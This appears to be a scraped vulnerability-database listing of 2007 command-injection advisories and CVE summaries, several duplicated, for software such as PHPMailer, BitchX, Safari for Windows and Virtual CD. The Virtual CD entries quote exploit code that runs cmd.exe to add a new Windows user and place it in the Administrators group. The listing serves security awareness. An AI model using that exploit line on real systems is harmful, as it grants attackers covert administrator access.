CVE-2007-3621

Multiple CRLF injection vulnerabilities in callboth.php in AsteriDex 3.0 and earlier allow remote attackers to inject arbitrary shell commands via the 1 IN and 2 OUT parameters...

[SECURITY] Fedora 7 Update: ekg-1.7-1.fc7

EKG "Eksperymentalny Klient Gadu-Gadu" is an open source gadu-gadu client for UNIX systems. Gadu-Gadu is an instant messaging program, very popular in Poland. EKG features include: - irssi-like ncurses interface - sending and receiving files - voice conversations - launching shell commands on...

CVE-2007-3360

hook.c in BitchX 1.1-final allows remote IRC servers to execute arbitrary commands by sending a client certain data containing NICK and EXEC strings, which exceeds the bounds of a hash table, and injects an EXEC hook function that receives and executes shell commands...

Out-of-bounds

hook.c in BitchX 1.1-final allows remote IRC servers to execute arbitrary commands by sending a client certain data containing NICK and EXEC strings, which exceeds the bounds of a hash table, and injects an EXEC hook function that receives and executes shell commands...

CVE-2007-3360

hook.c in BitchX 1.1-final allows remote IRC servers to execute arbitrary commands by sending a client certain data containing NICK and EXEC strings, which exceeds the bounds of a hash table, and injects an EXEC hook function that receives and executes shell commands...

DSA-1315-1 libphp-phpmailer

Bulletin has no description...

Command injection

PHPMailer 1.7, when configured to use sendmail, allows remote attackers to execute arbitrary shell commands via shell metacharacters in the SendmailSend function in class.phpmailer.php...

CVE-2007-3215

PHPMailer 1.7, when configured to use sendmail, allows remote attackers to execute arbitrary shell commands via shell metacharacters in the SendmailSend function in class.phpmailer.php...

CVE-2007-3215

PHPMailer 1.7, when configured to use sendmail, allows remote attackers to execute arbitrary shell commands via shell metacharacters in the SendmailSend function in class.phpmailer.php...

CVE-2007-3215

PHPMailer 1.7, when configured to use sendmail, allows remote attackers to execute arbitrary shell commands via shell metacharacters in the SendmailSend function in class.phpmailer.php...

Safari for Windows, 0day URL protocol handler command injection

Apple released version 3 of their popular Safari web browser today, with the added twist of offering both an OS X and a Windows version. Given that Apple has had a lousy track record with security on OS X, in addition to a hostile attitude towards security researchers, a lot of people are expecti...

Design/Logic Flaw

my.activation.php3 in F5 FirePass 4100 SSL VPN allows remote attackers to execute arbitrary shell commands via shell metacharacters in the username parameter...

CVE-2007-3097

my.activation.php3 in F5 FirePass 4100 SSL VPN allows remote attackers to execute arbitrary shell commands via shell metacharacters in the username parameter...

Debian DSA-1297-1 : gforge-plugin-scmcvs - missing input sanitising

Bernhard R. Link discovered that the CVS browsing interface of Gforge, a collaborative development tool, performs insufficient escaping of URLs, which allows the execution of arbitrary shell commands with the privileges of the www-data user. The oldstable distribution sarge is not affected by thi...

Virtual CD 9.0.0.2 (vc9api.DLL) Remote Shell Commands Execution Exploit

No description provided by source. !-- IE 6 / Virtual CD 9.0.0.2 vc9api.DLL 9.0.0.57 remote shell commands execution exploit by rgod site: retrogod.altervista.org software site: http://www.virtualcd-online.com/ -- html object classid='clsid:C75848D7-72BD-499C-80F3-FD0ED62DF58C'...

Virtual CD 9.0.0.2 - vc9api.DLL Remote Shell Commands Execution

Virtual CD 9.0.0.2 - vc9api.DLL Remote Shell Commands Execution strCmd="cmd.exe /c net user sun tzu /add | net localgroup Administrators sun /add " strWorkDir="c:\windows\system32" showCmd=1 bWait=1 VCDAPILibApi.VCDLaunchAndWait strCmd ,strWorkDir ,showCmd ,bWait milw0rm.com 2007-05-21...

Virtual CD 9.0.0.2 (vc9api.DLL) Remote Shell Commands Execution Exploit

Exploit for unknown platform in category remote exploits ======================================================================= Virtual CD 9.0.0.2 vc9api.DLL Remote Shell Commands Execution Exploit ======================================================================= strCmd="cmd.exe /c net use...

Virtual CD 9.0.0.2 - 'vc9api.DLL' Remote Shell Commands Execution

strCmd="cmd.exe /c net user sun tzu /add | net localgroup Administrators sun /add " strWorkDir="c:\windows\system32" showCmd=1 bWait=1 VCDAPILibApi.VCDLaunchAndWait strCmd ,strWorkDir ,showCmd ,bWait milw0rm.com 2007-05-21...

vim-7 modeline security issue

The sandbox for vim allows dangerous functions such as 1 writefile, 2 feedkeys, and 3 system, which might allow user-assisted attackers to execute shell commands and write files via modelines...

CVE-2007-2438

The sandbox for vim allows dangerous functions such as 1 writefile, 2 feedkeys, and 3 system, which might allow user-assisted attackers to execute shell commands and write files via modelines...